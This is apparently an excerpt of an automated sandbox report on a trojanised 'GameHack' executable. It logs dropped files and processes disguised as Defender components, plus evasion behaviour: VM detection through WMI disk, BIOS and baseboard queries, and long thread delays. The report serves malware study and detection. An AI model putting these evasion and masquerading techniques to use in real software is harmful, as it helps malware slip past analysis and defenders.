                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTR
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, PNPDeviceID, Description, MediaType FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, PNPDeviceID, Description, MediaType FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, PNPDeviceID, Description, MediaType FROM Win32_DiskDrive
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, serialnumber FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeMemory allocated: 4900000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 17D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 3120000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 5120000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 1570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 3180000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeMemory allocated: 2F80000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E80000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4E80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeMemory allocated: 1630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeMemory allocated: 840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeMemory allocated: 1A5B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1612
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWindow / User API: threadDelayed 641
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\PxMOoBdB.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\BpJZMyRc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\ErvIhhWY.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\syFrxmlp.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\wowiEjmi.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\QLuoYXmy.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\mOMkzqHG.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\jdhUscxN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\brpMezGb.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\WmQvmhxk.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe TID: 7624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep count: 1612 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep count: 294 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120Thread sleep count: 40 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120Thread sleep time: -12000000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7980Thread sleep count: 163 > 30
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7980Thread sleep time: -163000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 8212Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe TID: 6244Thread sleep count: 641 > 30
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe TID: 3964Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber, Version FROM Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A0A5F4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A1B8E0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2AAA8 FindFirstFileExA,0_2_00A2AAA8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,8_2_00EDA5F4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,8_2_00EEB8E0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EFAAA8 FindFirstFileExA,8_2_00EFAAA8
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1DD72 VirtualQuery,GetSystemInfo,0_2_00A1DD72
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData\Local
